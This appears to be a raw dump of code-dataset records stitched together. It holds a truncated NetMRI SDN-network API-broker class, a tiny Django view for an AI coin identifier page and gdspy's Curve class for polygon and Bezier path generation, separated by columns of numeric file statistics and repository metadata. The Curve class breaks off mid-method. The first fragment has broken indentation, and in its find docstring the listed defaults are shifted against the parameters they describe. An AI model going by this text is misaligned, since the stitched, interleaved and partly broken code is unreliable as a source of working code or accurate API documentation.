    :param sort: (Array of String, optional, default sdn_network_id) Field(s) to sort by. Valid: sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime.
    :param dir: (Array of String, optional, default asc) Sort direction(s); 'asc' or 'desc'.
    :param select: (Array, optional) Attributes to return for each SdnNetwork; all attributes if empty or omitted.
    :param goto_field: (String, optional) Field name for NIOS GOTO, used to locate a row position of records.
    :param goto_value: (String, optional) Value of goto_field for NIOS GOTO.
    :return: Array of SdnNetwork objects matching the specified input criteria.
    """
    method_name = self._get_method_fullname("index")
    return self.api_list_request(method_name, kwargs)
def search(self, **kwargs):
    """List the sdn networks matching the input criteria.

    More flexible than :meth:`index`, but more demanding on the system
    and slower. The field inputs below filter the result, together with
    the optional ``query`` string and ``xml_filter``.

    :param EndTime: (Array of DateTime, optional) Ending date/time of this network.
    :param StartTime: (Array of DateTime, optional) Starting date/time of this network.
    :param fabric_id: (Array of Integer, optional) Identifier of the SdnSetting from which this network was collected.
    :param sdn_network_id: (Array of Integer, optional) Internal NetMRI identifier for this network.
    :param sdn_network_key: (Array of String, optional) Unique identifier of each network at the SDN controller side.
    :param sdn_network_name: (Array of String, optional) Name of the SDN network.
    :param virtual_network_id: (Array of Integer, optional) ID of the Virtual Network assigned to this network.
    :param methods: (Array of String, optional) Sdn network methods called on each returned record. Available: fabric_handle.
    :param start: (Integer, optional, default 0) Record number to return in the selected page of data.
    :param limit: (Integer, optional, default 1000) Page size; maximum is 10000.
    :param sort: (Array of String, optional, default sdn_network_id) Field(s) to sort by.
    :param dir: (Array of String, optional, default asc) Sort direction(s); 'asc' or 'desc'.
    :param select: (Array, optional) Attributes to return for each SdnNetwork; all attributes if empty or omitted.
    :param goto_field: (String, optional) Field name for NIOS GOTO, used to locate a row position of records.
    :param goto_value: (String, optional) Value of goto_field for NIOS GOTO.
    :param query: (String, optional) Matched against the searchable attributes (EndTime, StartTime, fabric_id, sdn_network_id, sdn_network_key, sdn_network_name, virtual_network_id); surround with '/' for a regular-expression search.
    :param xml_filter: (String, optional) SetFilter XML structure applied after field values but before limit/pagination.
    :return: Array of SdnNetwork objects matching the specified input criteria.
    """
    method_name = self._get_method_fullname("search")
    return self.api_list_request(method_name, kwargs)
def find(self, **kwargs):
"""Lists the available sdn networks matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: EndTime, StartTime, fabric_id, sdn_network_id, sdn_network_key, sdn_network_name, virtual_network_id.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_EndTime: The operator to apply to the field EndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. EndTime: The ending date/time of this network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_EndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_EndTime: If op_EndTime is specified, the field named in this input will be compared to the value in EndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_EndTime must be specified if op_EndTime is specified.
:type val_f_EndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_EndTime: If op_EndTime is specified, this value will be compared to the value in EndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_EndTime must be specified if op_EndTime is specified.
:type val_c_EndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StartTime: The operator to apply to the field StartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StartTime: The starting date/time of this network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StartTime: If op_StartTime is specified, the field named in this input will be compared to the value in StartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StartTime must be specified if op_StartTime is specified.
:type val_f_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StartTime: If op_StartTime is specified, this value will be compared to the value in StartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StartTime must be specified if op_StartTime is specified.
:type val_c_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_fabric_handle: The operator to apply to the field fabric_handle. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. fabric_handle: Name of SDN controller from which this network was collected. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_fabric_handle: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_fabric_handle: If op_fabric_handle is specified, the field named in this input will be compared to the value in fabric_handle using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_fabric_handle must be specified if op_fabric_handle is specified.
:type val_f_fabric_handle: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_fabric_handle: If op_fabric_handle is specified, this value will be compared to the value in fabric_handle using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_fabric_handle must be specified if op_fabric_handle is specified.
:type val_c_fabric_handle: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_fabric_id: The operator to apply to the field fabric_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. fabric_id: Identifier of SdnSetting from which this network was collected For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_fabric_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_fabric_id: If op_fabric_id is specified, the field named in this input will be compared to the value in fabric_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_fabric_id must be specified if op_fabric_id is specified.
:type val_f_fabric_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_fabric_id: If op_fabric_id is specified, this value will be compared to the value in fabric_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_fabric_id must be specified if op_fabric_id is specified.
:type val_c_fabric_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_sdn_network_id: The operator to apply to the field sdn_network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. sdn_network_id: The internal NetMRI identifier for this network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_sdn_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_sdn_network_id: If op_sdn_network_id is specified, the field named in this input will be compared to the value in sdn_network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_sdn_network_id must be specified if op_sdn_network_id is specified.
:type val_f_sdn_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_sdn_network_id: If op_sdn_network_id is specified, this value will be compared to the value in sdn_network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_sdn_network_id must be specified if op_sdn_network_id is specified.
:type val_c_sdn_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_sdn_network_key: The operator to apply to the field sdn_network_key. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. sdn_network_key: The unique identifier of each network at the SDN controller side For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_sdn_network_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_sdn_network_key: If op_sdn_network_key is specified, the field named in this input will be compared to the value in sdn_network_key using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_sdn_network_key must be specified if op_sdn_network_key is specified.
:type val_f_sdn_network_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_sdn_network_key: If op_sdn_network_key is specified, this value will be compared to the value in sdn_network_key using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_sdn_network_key must be specified if op_sdn_network_key is specified.
:type val_c_sdn_network_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_sdn_network_name: The operator to apply to the field sdn_network_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. sdn_network_name: Name of SDN network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_sdn_network_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_sdn_network_name: If op_sdn_network_name is specified, the field named in this input will be compared to the value in sdn_network_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_sdn_network_name must be specified if op_sdn_network_name is specified.
:type val_f_sdn_network_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_sdn_network_name: If op_sdn_network_name is specified, this value will be compared to the value in sdn_network_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_sdn_network_name must be specified if op_sdn_network_name is specified.
:type val_c_sdn_network_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_virtual_network_id: The operator to apply to the field virtual_network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. virtual_network_id: ID of Virtual Network which is assigned to this network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_virtual_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_virtual_network_id: If op_virtual_network_id is specified, the field named in this input will be compared to the value in virtual_network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_virtual_network_id must be specified if op_virtual_network_id is specified.
:type val_f_virtual_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_virtual_network_id: If op_virtual_network_id is specified, this value will be compared to the value in virtual_network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_virtual_network_id must be specified if op_virtual_network_id is specified.
:type val_c_virtual_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of sdn network methods. The listed methods will be called on each sdn network returned and included in the output. Available methods are: fabric_handle.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` sdn_network_id
:param sort: The data field(s) to use for sorting the output. Default is sdn_network_id. Valid values are sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SdnNetwork. Valid values are sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return sdn_networks: An array of the SdnNetwork objects that match the specified input criteria.
:rtype sdn_networks: Array of SdnNetwork
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def show(self, **kwargs):
"""Shows the details for the specified sdn network.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param sdn_network_id: The internal NetMRI identifier for this network
:type sdn_network_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of sdn network methods. The listed methods will be called on each sdn network returned and included in the output. Available methods are: fabric_handle.
:type methods: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return sdn_network: The sdn network identified by the specified sdn_network_id.
:rtype sdn_network: SdnNetwork
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
| 52.886248
| 511
| 0.611685
| 4,125
| 31,150
| 4.50497
| 0.062303
| 0.071033
| 0.046171
| 0.060378
| 0.922994
| 0.921272
| 0.916321
| 0.909057
| 0.894635
| 0.886778
| 0
| 0.004498
| 0.30764
| 31,150
| 589
| 512
| 52.886248
| 0.857143
| 0.81923
| 0
| 0
| 0
| 0
| 0.043847
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.363636
| false
| 0
| 0.090909
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa1be20499b0c2d83b7d14122d502f70c10a238e
| 166
|
py
|
Python
|
ai_coin_identifier/views.py
|
JohnGWebDev/coinloggr
|
36a6065b1a8f8582cc5b24917a2f89bca2dcc14b
|
[
"BSD-3-Clause"
] | null | null | null |
ai_coin_identifier/views.py
|
JohnGWebDev/coinloggr
|
36a6065b1a8f8582cc5b24917a2f89bca2dcc14b
|
[
"BSD-3-Clause"
] | 1
|
2022-01-10T16:50:44.000Z
|
2022-01-10T16:50:44.000Z
|
ai_coin_identifier/views.py
|
JohnGWebDev/coinloggr
|
36a6065b1a8f8582cc5b24917a2f89bca2dcc14b
|
[
"BSD-3-Clause"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def ai_coin_identifier_home_page(request):
    """Render the AI coin identifier landing page for the given request."""
    template_name = 'ai_coin_identifier/index.html'
    return render(request, template_name)
| 27.666667
| 59
| 0.807229
| 24
| 166
| 5.333333
| 0.791667
| 0.09375
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114458
| 166
| 6
| 59
| 27.666667
| 0.870748
| 0.138554
| 0
| 0
| 0
| 0
| 0.204225
| 0.204225
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
fa2917be92ab8a53c6a854e4f886527710bd95c9
| 30,824
|
py
|
Python
|
gdspy/curve.py
|
leviathanch/gdspy
|
d440538fa9d1e0f58a7cdc77471f5fe2408e6fea
|
[
"BSL-1.0"
] | 1
|
2020-01-06T23:15:28.000Z
|
2020-01-06T23:15:28.000Z
|
gdspy/curve.py
|
leviathanch/gdspy
|
d440538fa9d1e0f58a7cdc77471f5fe2408e6fea
|
[
"BSL-1.0"
] | null | null | null |
gdspy/curve.py
|
leviathanch/gdspy
|
d440538fa9d1e0f58a7cdc77471f5fe2408e6fea
|
[
"BSL-1.0"
] | null | null | null |
######################################################################
# #
# Copyright 2009-2019 Lucas Heitzmann Gabrielli. #
# This file is part of gdspy, distributed under the terms of the #
# Boost Software License - Version 1.0. See the accompanying #
# LICENSE file or <http://www.boost.org/LICENSE_1_0.txt> #
# #
######################################################################
"""
Curve class.
"""
import numpy
from gdspy import _func_bezier, _hobby, _zero
class Curve(object):
    """
    Generation of curves loosely based on SVG paths.
    Short summary of available methods:
    ====== =============================
    Method Primitive
    ====== =============================
    L/l    Line segments
    H/h    Horizontal line segments
    V/v    Vertical line segments
    C/c    Cubic Bezier curve
    S/s    Smooth cubic Bezier curve
    Q/q    Quadratic Bezier curve
    T/t    Smooth quadratic Bezier curve
    B/b    General degree Bezier curve
    I/i    Smooth interpolating curve
    arc    Elliptical arc
    ====== =============================
    The uppercase version of the methods considers that all coordinates
    are absolute, whereas the lowercase considers that they are relative
    to the current end point of the curve.
    Parameters
    ----------
    x : number
        X-coordinate of the starting point of the curve. If this is a
        complex number, the value of `y` is ignored and the starting
        point becomes ``(x.real, x.imag)``.
    y : number
        Y-coordinate of the starting point of the curve.
    tolerance : number
        Tolerance used to calculate a polygonal approximation to the
        curve.
    Notes
    -----
    In all methods of this class that accept coordinate pairs, a single
    complex number can be passed to be split into its real and imaginary
    parts.
    This feature can be useful in expressing coordinates in polar form.
    All commands follow the SVG 2 specification, except for elliptical
    arcs and smooth interpolating curves, which are inspired by the
    Metapost syntax.
    Examples
    --------
    >>> curve = gdspy.Curve(3, 4).H(1).q(0.5, 1, 2j).L(2 + 3j, 2, 2)
    >>> pol = gdspy.Polygon(curve.get_points())
    """
    # __slots__ avoids a per-instance __dict__: points is the polygonal
    # approximation built so far, tol the *squared* tolerance, and
    # last_c/last_q the control points used by the smooth commands S/s, T/t.
    __slots__ = "points", "tol", "last_c", "last_q"
def __init__(self, x, y=0, tolerance=0.01):
self.last_c = self.last_q = None
self.tol = tolerance ** 2
if isinstance(x, complex):
self.points = [numpy.array((x.real, x.imag))]
else:
self.points = [numpy.array((x, y))]
def get_points(self):
"""
Get the polygonal points that approximate this curve.
Returns
-------
out : Numpy array[N, 2]
Vertices of the polygon.
"""
delta = (self.points[-1] - self.points[0]) ** 2
if delta[0] + delta[1] < self.tol:
return numpy.array(self.points[:-1])
return numpy.array(self.points)
def L(self, *xy):
"""
Add straight line segments to the curve.
Parameters
----------
xy : numbers
Endpoint coordinates of the line segments.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
i = 0
while i < len(xy):
if isinstance(xy[i], complex):
self.points.append(numpy.array((xy[i].real, xy[i].imag)))
i += 1
else:
self.points.append(numpy.array((xy[i], xy[i + 1])))
i += 2
return self
def l(self, *xy):
"""
Add straight line segments to the curve.
Parameters
----------
xy : numbers
Endpoint coordinates of the line segments relative to the
current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
o = self.points[-1]
i = 0
while i < len(xy):
if isinstance(xy[i], complex):
self.points.append(o + numpy.array((xy[i].real, xy[i].imag)))
i += 1
else:
self.points.append(o + numpy.array((xy[i], xy[i + 1])))
i += 2
return self
def H(self, *x):
"""
Add horizontal line segments to the curve.
Parameters
----------
x : numbers
Endpoint x-coordinates of the line segments.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
y0 = self.points[-1][1]
self.points.extend(numpy.array((xx, y0)) for xx in x)
return self
def h(self, *x):
"""
Add horizontal line segments to the curve.
Parameters
----------
x : numbers
Endpoint x-coordinates of the line segments relative to the
current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
x0, y0 = self.points[-1]
self.points.extend(numpy.array((x0 + xx, y0)) for xx in x)
return self
def V(self, *y):
"""
Add vertical line segments to the curve.
Parameters
----------
y : numbers
Endpoint y-coordinates of the line segments.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
x0 = self.points[-1][0]
self.points.extend(numpy.array((x0, yy)) for yy in y)
return self
def v(self, *y):
"""
Add vertical line segments to the curve.
Parameters
----------
y : numbers
Endpoint y-coordinates of the line segments relative to the
current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
x0, y0 = self.points[-1]
self.points.extend(numpy.array((x0, y0 + yy)) for yy in y)
return self
    def arc(self, radius, initial_angle, final_angle, rotation=0):
        """
        Add an elliptical arc to the curve.
        Parameters
        ----------
        radius : number, array-like[2]
            Arc radius. An elliptical arc can be created by passing an
            array with 2 radii.
        initial_angle : number
            Initial angle of the arc (in *radians*).
        final_angle : number
            Final angle of the arc (in *radians*).
        rotation : number
            Rotation of the axis of the ellipse.
        Returns
        -------
        out : `Curve`
            This curve.
        """
        # An arc is not a Bezier segment, so it breaks any smooth
        # continuation (S/s, T/t) state.
        self.last_c = self.last_q = None
        if hasattr(radius, "__iter__"):
            rx, ry = radius
            # Use the larger radius for the sampling-density estimate below.
            radius = max(radius)
        else:
            rx = ry = radius
        full_angle = abs(final_angle - initial_angle)
        # Choose enough samples (at least 3) for the angular step implied by
        # the tolerance; self.tol holds the *squared* tolerance, hence the
        # ** 0.5 to recover it.
        number_of_points = max(
            3,
            1
            + int(0.5 * full_angle / numpy.arccos(1 - self.tol ** 0.5 / radius) + 0.5),
        )
        angles = numpy.linspace(
            initial_angle - rotation, final_angle - rotation, number_of_points
        )
        # Sample the axis-aligned ellipse, then rotate the samples by
        # `rotation` if needed.
        pts = numpy.vstack((rx * numpy.cos(angles), ry * numpy.sin(angles))).T
        if rotation != 0:
            rot = numpy.empty_like(pts)
            c = numpy.cos(rotation)
            s = numpy.sin(rotation)
            rot[:, 0] = pts[:, 0] * c - pts[:, 1] * s
            rot[:, 1] = pts[:, 0] * s + pts[:, 1] * c
        else:
            rot = pts
        # Translate so the arc starts at the current end point, and skip the
        # first sample, which coincides with that point.
        pts = rot[1:] - rot[0] + self.points[-1]
        self.points.extend(xy for xy in pts)
        return self
    def C(self, *xy):
        """
        Add cubic Bezier curves to the curve.
        Parameters
        ----------
        xy : numbers
            Coordinate pairs. Each set of 3 pairs are interpreted as
            the control point at the beginning of the curve, the control
            point at the end of the curve and the endpoint of the curve.
        Returns
        -------
        out : `Curve`
            This curve.
        """
        # A cubic segment invalidates the smooth-quadratic (T/t) state.
        self.last_q = None
        i = 0
        while i < len(xy):
            # Build the 4 cubic control points: current end point plus 3
            # pairs consumed from xy (a complex number counts as one pair).
            ctrl = numpy.empty((4, 2))
            ctrl[0] = self.points[-1]
            for j in range(1, 4):
                if isinstance(xy[i], complex):
                    ctrl[j, 0] = xy[i].real
                    ctrl[j, 1] = xy[i].imag
                    i += 1
                else:
                    ctrl[j, 0] = xy[i]
                    ctrl[j, 1] = xy[i + 1]
                    i += 2
            # _func_bezier (imported from gdspy) returns an evaluator for the
            # Bezier defined by ctrl — presumably over u in [0, 1].
            f = _func_bezier(ctrl)
            uu = [0, 0.2, 0.5, 0.8, 1]
            fu = [f(u) for u in uu]
            iu = 1
            # Adaptive refinement: insert the midpoint of any parameter
            # interval whose chord midpoint deviates from the curve by more
            # than the tolerance (self.tol is the squared tolerance).
            while iu < len(fu):
                test_u = 0.5 * (uu[iu - 1] + uu[iu])
                test_pt = f(test_u)
                test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
                if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
                    uu.insert(iu, test_u)
                    fu.insert(iu, test_pt)
                else:
                    iu += 1
            # Append the samples (skip the first: it is the current end
            # point) and remember the second control point for S/s mirroring.
            self.points.extend(xy for xy in fu[1:])
            self.last_c = ctrl[2]
        return self
    def c(self, *xy):
        """
        Add cubic Bezier curves to the curve.
        Parameters
        ----------
        xy : numbers
            Coordinate pairs. Each set of 3 pairs are interpreted as
            the control point at the beginning of the curve, the control
            point at the end of the curve and the endpoint of the curve.
            All coordinates are relative to the current end point.
        Returns
        -------
        out : `Curve`
            This curve.
        """
        # A cubic segment invalidates the smooth-quadratic (T/t) state.
        self.last_q = None
        # NOTE: offsets are relative to the end point at the start of this
        # call (x0, y0); it is not updated between consecutive segments.
        x0, y0 = self.points[-1]
        i = 0
        while i < len(xy):
            ctrl = numpy.empty((4, 2))
            ctrl[0, 0] = x0
            ctrl[0, 1] = y0
            # Consume 3 pairs from xy; a complex number counts as one pair.
            for j in range(1, 4):
                if isinstance(xy[i], complex):
                    ctrl[j, 0] = x0 + xy[i].real
                    ctrl[j, 1] = y0 + xy[i].imag
                    i += 1
                else:
                    ctrl[j, 0] = x0 + xy[i]
                    ctrl[j, 1] = y0 + xy[i + 1]
                    i += 2
            # _func_bezier (imported from gdspy) evaluates the Bezier
            # defined by ctrl.
            f = _func_bezier(ctrl)
            uu = [0, 0.2, 0.5, 0.8, 1]
            fu = [f(u) for u in uu]
            iu = 1
            # Adaptive refinement: subdivide while the chord midpoint
            # deviates from the curve by more than the squared tolerance.
            while iu < len(fu):
                test_u = 0.5 * (uu[iu - 1] + uu[iu])
                test_pt = f(test_u)
                test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
                if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
                    uu.insert(iu, test_u)
                    fu.insert(iu, test_pt)
                else:
                    iu += 1
            # Skip the first sample (current end point); remember the second
            # control point for S/s mirroring.
            self.points.extend(xy for xy in fu[1:])
            self.last_c = ctrl[2]
        return self
    def S(self, *xy):
        """
        Add smooth cubic Bezier curves to the curve.
        Parameters
        ----------
        xy : numbers
            Coordinate pairs. Each set of 2 pairs are interpreted as
            the control point at the end of the curve and the endpoint
            of the curve. The control point at the beginning of the
            curve is assumed to be the reflection of the control point
            at the end of the last curve relative to the starting point
            of the curve. If the previous curve is not a cubic Bezier,
            the control point is coincident with the starting point.
        Returns
        -------
        out : `Curve`
            This curve.
        """
        # A cubic segment invalidates the smooth-quadratic (T/t) state.
        self.last_q = None
        # No previous cubic: reflect about the current point itself, which
        # makes the first control point coincide with the starting point.
        if self.last_c is None:
            self.last_c = self.points[-1]
        i = 0
        while i < len(xy):
            ctrl = numpy.empty((4, 2))
            ctrl[0] = self.points[-1]
            # First control point: reflection of the previous cubic's second
            # control point through the current end point.
            ctrl[1] = 2 * ctrl[0] - self.last_c
            # Consume 2 pairs from xy; a complex number counts as one pair.
            for j in range(2, 4):
                if isinstance(xy[i], complex):
                    ctrl[j, 0] = xy[i].real
                    ctrl[j, 1] = xy[i].imag
                    i += 1
                else:
                    ctrl[j, 0] = xy[i]
                    ctrl[j, 1] = xy[i + 1]
                    i += 2
            # _func_bezier (imported from gdspy) evaluates the Bezier
            # defined by ctrl.
            f = _func_bezier(ctrl)
            uu = [0, 0.2, 0.5, 0.8, 1]
            fu = [f(u) for u in uu]
            iu = 1
            # Adaptive refinement: subdivide while the chord midpoint
            # deviates from the curve by more than the squared tolerance.
            while iu < len(fu):
                test_u = 0.5 * (uu[iu - 1] + uu[iu])
                test_pt = f(test_u)
                test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
                if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
                    uu.insert(iu, test_u)
                    fu.insert(iu, test_pt)
                else:
                    iu += 1
            # Skip the first sample (current end point); remember the second
            # control point for the next smooth segment.
            self.points.extend(xy for xy in fu[1:])
            self.last_c = ctrl[2]
        return self
    def s(self, *xy):
        """
        Add smooth cubic Bezier curves to the curve.
        Parameters
        ----------
        xy : numbers
            Coordinate pairs. Each set of 2 pairs are interpreted as
            the control point at the end of the curve and the endpoint
            of the curve. The control point at the beginning of the
            curve is assumed to be the reflection of the control point
            at the end of the last curve relative to the starting point
            of the curve. If the previous curve is not a cubic Bezier,
            the control point is coincident with the starting point.
            All coordinates are relative to the current end point.
        Returns
        -------
        out : `Curve`
            This curve.
        """
        # A cubic segment invalidates the smooth-quadratic (T/t) state.
        self.last_q = None
        # No previous cubic: reflect about the current point itself.
        if self.last_c is None:
            self.last_c = self.points[-1]
        # NOTE: offsets are relative to the end point at the start of this
        # call (x0, y0); it is not updated between consecutive segments.
        x0, y0 = self.points[-1]
        i = 0
        while i < len(xy):
            ctrl = numpy.empty((4, 2))
            ctrl[0, 0] = x0
            ctrl[0, 1] = y0
            # First control point: reflection of the previous cubic's second
            # control point through the starting point.
            ctrl[1] = 2 * ctrl[0] - self.last_c
            # Consume 2 pairs from xy; a complex number counts as one pair.
            for j in range(2, 4):
                if isinstance(xy[i], complex):
                    ctrl[j, 0] = x0 + xy[i].real
                    ctrl[j, 1] = y0 + xy[i].imag
                    i += 1
                else:
                    ctrl[j, 0] = x0 + xy[i]
                    ctrl[j, 1] = y0 + xy[i + 1]
                    i += 2
            # _func_bezier (imported from gdspy) evaluates the Bezier
            # defined by ctrl.
            f = _func_bezier(ctrl)
            uu = [0, 0.2, 0.5, 0.8, 1]
            fu = [f(u) for u in uu]
            iu = 1
            # Adaptive refinement: subdivide while the chord midpoint
            # deviates from the curve by more than the squared tolerance.
            while iu < len(fu):
                test_u = 0.5 * (uu[iu - 1] + uu[iu])
                test_pt = f(test_u)
                test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
                if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
